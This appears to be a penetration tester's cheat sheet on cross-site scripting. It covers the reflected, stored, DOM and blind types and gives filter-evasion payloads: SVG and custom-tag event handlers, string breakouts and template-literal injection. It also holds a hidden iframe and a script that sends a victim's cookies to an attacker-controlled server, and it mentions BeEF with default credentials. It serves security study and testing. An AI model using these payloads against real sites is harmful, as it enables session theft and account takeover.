Cross site scripting (XSS)

Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

-- Wikipedia

• XSS Filter Evasion Cheat Sheet - OWASP

• PayloadsAllTheThings/XSS Injection at master · swisskyrepo/PayloadsAllTheThings · GitHub

• GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com

• PortSwigger Cheat Sheet

• XSSMap

Types of XSS

Reflected (non-persistent)

Javascript code sent in a request, e.g. via query parameters or form data, is reflected in the response.

E.g.:

https://domain.com/?error=<script>alert(1)</script>

To exploit victims you need an external delivery mechanism, like email, a tweet or other message.

Stored (persistent)

Javascript code gets stored on the server and displayed in an unsafe way to other users.

Entry points:

• URL query string

• Message body

• Request headers

• Any out-of-band routes

Exit points:

• All possible HTTP responses

-> Try to find links between entry and exit points.

E.g.: Use <script>alert(1)</script> as username, in a comment post, etc.

Via img: <img src="." onerror="alert('test');" /> Via url: <a href="javascript:alert('test')>test</a>

As your payload is stored on the server, you don't an external delivery mechanism (as for reflected XSS), therefore stored XSS is generally considered a more severe vulnerability.

DOM-based (client-side code)

Attacker gets control over Javascript variables that are written to the DOM or used in methods like eval() or innerHTML.

HTML sinks

Place random alphanumeric strings into the source (e.g. location.search) and inspect the DOM using a browsers developer tools.

JS sinks

Using the browsers developer tools you can inspect and follow your input through the JavaScript code and check if/how it is sent to a sink.

See also PortSwigger - Web Security Academy - Which sinks can lead to DOM-XSS vulnerabilities?.

jQuery

Sinks:

• attr()

• $()

AngularJS

Check for ng-app attribute, then use {{...}} to inject JavaScript.

Blind

Similar to "Stored", but you won't see the output/impact directly. E.g.

• Submitting a contact form containing XSS

Bypass WAF

Tags and events

Use "Copy tags to clipboard" and "Copy events to clipboard" from PortSwigger - XSS Cheat Sheet to detect unfiltered tags and events (e.g. using Burp Intruder).

Custom tag

Trigger XSS using custom html tags.

<bla id=blub onfocus=alert(1) tabindex=1>#blub

SVG tag

Using animation and onbegin event:

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect><animateTransform onbegin="alert(1)" /></rect></svg>

Using svg animate tag to set the href attribute for anchor tag:

<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me!</text></a></svg>

Break out JS string

E.g. using:

'-alert(1)-'
';alert(1)//'

HTML encoding

Single quote, get's decoded first and then executed when used in event handlers like onclick.

'

Template literals

Templates literals are encapsulated in backticks and ${...} syntax can be used to evaluate JavaScipt inside them.

document.getElementById('message').innerText = `user controllable data`; // inject e.g. ${alert(1)}

Polyglots

Xss JaVaSCRipt PoLYglOTs

Iframe injection

<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>

Stealing cookies & sessions

Let the user request an image from your server and send his cookie as a GET param.

<script>
new Image().src="https://<your-server>?cookie="+document.cookie;
</script> 

BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF - The Browser Exploitation Framework Project

Start ./beef Username: beef Password: beef